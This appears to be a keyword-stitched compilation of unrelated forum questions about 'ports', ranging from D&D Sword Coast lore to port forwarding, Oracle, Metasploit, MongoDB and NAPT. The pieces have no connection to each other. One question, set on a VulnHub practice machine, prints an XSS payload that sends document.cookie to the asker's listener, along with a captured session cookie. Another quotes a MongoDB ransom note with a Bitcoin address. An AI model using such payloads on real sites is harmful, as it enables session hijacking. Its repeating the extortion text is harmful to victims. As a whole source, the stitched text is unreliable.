Which Sword Coast port has bugbears loading and unloading ships?

I remember reading in some published book (most probably from the 3e era but I’m not sure; surely not from 5e) that in a certain port in the Sword Coast (I’d say Waterdeep, but Neverwinter and Luskan are also possible given where our characters were located at that time) bugbears sometimes look for employment as load workers at the docks, but they often get into trouble because other people around there treat them as stupid just because of their looks.

Bugbears have average intelligence and wisdom, so they’re rightfully enraged by the accusation, but they have a bad temper and fights ensue.

Where did I read this piece of lore, and which was the town?

Localhost website not accessible from Public IP despite port forwarding

My tiny office has 1 router, which is connected to ADSL line on one end and my laptop on other end. In office, laptop’s local IP is 192.168.1.2.

On the office router, I have set up port (22) forwarding for SSH access. I also have a DuckDNS script that allows me to ssh -v -t -L 5900:localhost:5900 myname.duckdns.org into my office laptop whenever I want.

I followed the same port-forwarding procedure to configure my router to forward Port 8082 to 192.168.1.2 (TCP, WAN interface is pppoe2). I ran a python/nodejs http server listening on 0.0.0.0:8082.

If I try to access my newly spun server from the public IP I get a timeout. This is the problem. I can SSH into my remote machine, but the website hosted on it doesn’t work.

Steps tried:

I take remote desktop of office laptop (using port 5900 for x11 forwarding) and find that firefox can open localhost:8082, 127.0.0.1:8082 and 192.168.1.2:8082 properly.

I tried shutting down extra services like gogs and nginx (which was listening on port 80 even though I didn’t tell it to) via systemctl, but still no luck.

Further, curl http://PUBLIC_IP:8082 gives different outputs:

  1. At home, in my Cmder I get curl: (7) Failed to connect to PUBLIC_IP port 8082: Timed out
  2. However, in SSH terminal (i.e. of remote machine), I get curl: (7) Failed to connect to PUBLIC_IP port 8082: Connection refused

Why is connection refused?

Thanks to @davidgo, I tried

    $ sudo tcpdump -vv -i enp7s0 | grep 8082
    tcpdump: listening on enp7s0, link-type EN10MB (Ethernet), capture size 262144 bytes

If I curl localhost:8082 or 192.168.1.2:8082 I see 200 on server logs but I don’t see any output in the above command.
But if I curl PUBLIC_IP:8082 from

  1. inside SSH session I get
    duckDNSsubDomain.40626 > abts-north-dynamic-031.P3.P2.P1.airtelbroadband.in.8082: Flags [S], cksum 0x469a (incorrect -> 0x84f5), seq 18095393, win 64240, options [mss 1460,sackOK,TS val 2474578357 ecr 0,nop,wscale 7], length 0
    abts-north-dynamic-031.P3.P2.P1.airtelbroadband.in.8082 > duckDNSsubDomain.40626: Flags [R.], cksum 0x8cea (correct), seq 0, ack 18095394, win 0, length 0

and a quick connection refused complaint by curl (BTW my public IPv4 looks like P1.P2.P3.31).

  2. And if I do the same curl from my home computer I see
    157.32.251.70.50664 > duckDNSsubDomain.8082: Flags [S], cksum 0x299d (correct), seq 132055921, win 64240, options [mss 1370,nop,wscale 8,nop,nop,sackOK], length 0
    157.32.251.70.50664 > duckDNSsubDomain.8082: Flags [S], cksum 0x299d (correct), seq 132055921, win 64240, options [mss 1370,nop,wscale 8,nop,nop,sackOK], length 0
    157.32.251.70.50664 > duckDNSsubDomain.8082: Flags [S], cksum 0x299d (correct), seq 132055921, win 64240, options [mss 1370,nop,wscale 8,nop,nop,sackOK], length 0
    157.32.251.70.50664 > duckDNSsubDomain.8082: Flags [S], cksum 0x299d (correct), seq 132055921, win 64240, options [mss 1370,nop,wscale 8,nop,nop,sackOK], length 0
    157.32.251.70.50664 > duckDNSsubDomain.8082: Flags [S], cksum 0x299d (correct), seq 132055921, win 64240, options [mss 1370,nop,wscale 8,nop,nop,sackOK], length 0

and curl fails with timeout.

Now I am guessing my ISP doesn’t like random ports. So I tried hosting my webserver on port 80. Again, localhost and 192.186.1.2 work as expected but http://PUBLIC_IP:80/ opens up router control panel 🙁

So I try hosting it on a well-known port that’s not 80 or 443. I choose 21 (FTP), use sudo to run webserver listening on 0.0.0.0:21 but firefox/chrome don’t let me open it and curl hangs for a while before failing with a timeout.

Oracle 19c express manager not loading, listener will not register https port after exec dbms_xdb_config.gethttpsport()

We just set up a new Oracle 19c install on a VM Windows Server 2020. I have been struggling trying to get the Express Manager working. At the end of the installation Oracle notified me that I can access the Express Manager at https://%localhost%:5500/em. But upon visiting the website in Chrome the connection is refused. I disabled the firewall and receive the same message. I went through the Oracle documentation and ensured that dbms_xdb_config.gethttpsport() outputs 5500.

After running lsnrctl status I noticed that under listeners I am missing port 5500. I searched for other users with the same issue; they all have an entry for port 5500 like the following.

    (DESCRIPTION=(ADDRESS=(PROTOCOL=tcps)(HOST=HOSTNAME.domain)(PORT=5500))(Security=(my_wallet_directory=C:\ORACLE\admin\ecoomdb\xdb_wallet))(Presentation=HTTP)(Session=RAW))
    Services Summary...

According to the Oracle documentation, when I run the command dbms_xdb_config.gethttpsport(5500) the listener should register the port. But after running the command multiple times this is not happening.

XSS on port other than 80 not working

I am currently doing a boot2root VulnHub machine and I have found an XSS entry point to steal admin cookies.

The strange thing is that if I run my SimpleHTTPServer on port 80 then the following payload triggers

<script>document.write('<img src="http://192.168.1.130/'+document.cookie+'" width=0 height=0 border=0 />');</script>

And I get the cookie like this

192.168.1.14 - - [13/Sep/2020 09:23:36] "GET /PHPSESSID=m18d10ghina3pbtlhn5sttrm8o HTTP/1.1" 404 -

But if I run my SimpleHTTPServer let’s say on port 4242 or any other port (I have tried a handful), the following payload does not trigger

<script>document.write('<img src="http://192.168.1.130:4242/'+document.cookie+'" width=0 height=0 border=0 />');</script>

Or at least I don’t see anything.

Please note that the boot2root VM seems to call every minute without fail.

I don’t know why this is happening. Does SimpleHTTPServer only work on port 80? It could be as simple as that, I guess, but I see examples on the internet with other ports being used so I doubt this is the case.

Do I need port forwarding for msfconsole remote target exploitation

I was running a series of test attacks on my virtual test machine. Here I had to set the RHOST option to the IP address of the target and LHOST to the IP address of my local machine. I am certain that this works well locally because both machines would be on the same private network, with private IP addresses. But what if I had my Linux machine (not a VM) connected to my phone, which is serving as a router? If I ran such an attack on a machine on the internet, RHOST would be the public IP address of the target machine; I am skeptical as to what IP address I would put for my LHOST option. Can I just use my private IP address (given to my Linux machine from my phone hotspot) as this option, or do I have to type in the public IP address of my phone? And if I do have to put in my phone’s public IP, is port forwarding needed in such a case or would it work just fine?

Mongo DB hacked (read_me_to_recover) without the port exposed in the firewall?

I have recently set up parse-server on a DO VPS, using 3 Docker containers: one for parse-server, one for parse-server dashboard and one for MongoDB. Because I am just testing this setup I left the mongo container as it is (mongodb://mongo:27017/dev). I have NGINX (not in Docker) running as a reverse proxy (to get SSL); it forwards ports 80 and 443 to http://127.0.0.1:4040 internally (the parse dashboard web GUI), and it routes 1338 to http://127.0.0.1:1337, the parse server (API) itself. This parse server connects to my mongo DB internally.

This is the first time I am using Docker and MongoDB. Because of this setup and the mongo DB port not being open, I thought it would be half-decently safe. My question is, how did the hacker breach my database? There was nothing of value stored but there might be in the future. I don’t think he exploited my parse server because I could see the connection coming from a CPython client (the parse connection showed as a NodeJS client).

I have added: NGINX, firewall, Docker processes, Mongo log lines

nginx terminal

    {"t":{"$date":"2020-08-13T12:23:14.165+00:00"},"s":"I",  "c":"NETWORK",  "id":22943,   "ctx":"listener","msg":"connection accepted","attr":{"remote":"46.182.106.190:39672","sessionId":31,"connectionCount":3}}
    {"t":{"$date":"2020-08-13T12:23:14.359+00:00"},"s":"I",  "c":"NETWORK",  "id":51800,   "ctx":"conn31","msg":"client metadata","attr":{"remote":"46.182.106.190:39672","client":"conn31","doc":{"driver":{"name":"PyMongo","version":"3.10.1"},"os":{"type":"Linux","name":"Linux","architecture":"x86_64","version":"4.15.0-112-generic"},"platform":"CPython 3.6.9.final.0"}}}
    {"t":{"$date":"2020-08-13T12:23:15.941+00:00"},"s":"I",  "c":"COMMAND",  "id":20337,   "ctx":"conn31","msg":"dropDatabase - starting","attr":{"db":"READ_ME_TO_RECOVER_YOUR_DATA"}}
    > db.README.find();
    { "_id" : ObjectId("5f3536cd2a546e2eea8211eb"), "content" : "All your data is a backed up. You must pay 0.015 BTC to 145Nny3Gi6nWVBz45Gv9SqxFajuwTb2qTw 48 hours for recover it. After 48 hours expiration we will leaked and exposed all your data. In case of refusal to pay, we will contact the General Data Protection Regulation, GDPR and notify them that you store user data in an open form and is not safe. Under the rules of the law, you face a heavy fine or arrest and your base dump will be dropped from our server! You can buy bitcoin here, does not take much time to buy https://localbitcoins.com with this guide https://localbitcoins.com/guides/how-to-buy-bitcoins After paying write to me in the mail with your DB IP: restore_base@tuta.io" }

Is it safe to expose port 22 on a database VM?

I have seen many answers to this question in different scenarios but I am still unsure of the actual answer.

I have a VM in the cloud (Azure), which will be hosting my production database. Is it safe to have port 22 open for my SSH connection? It also has a public IP address; is this safe too?

This is my first time having to concern myself with these types of questions so apologies for the lack of understanding.

Is IP masquerade and Network Address Port Translation(NAPT) the same?

Are IP masquerade and Network Address Port Translation (NAPT) the same? I’m not sure whether they are the same thing or not, but I realized the mechanism is almost the same: both IP masquerade and NAPT change the TCP/UDP port, and a many-to-one relation is allowed (multiple private addresses share one global IP address). If they are different, in which part do IP masquerade and NAPT differ?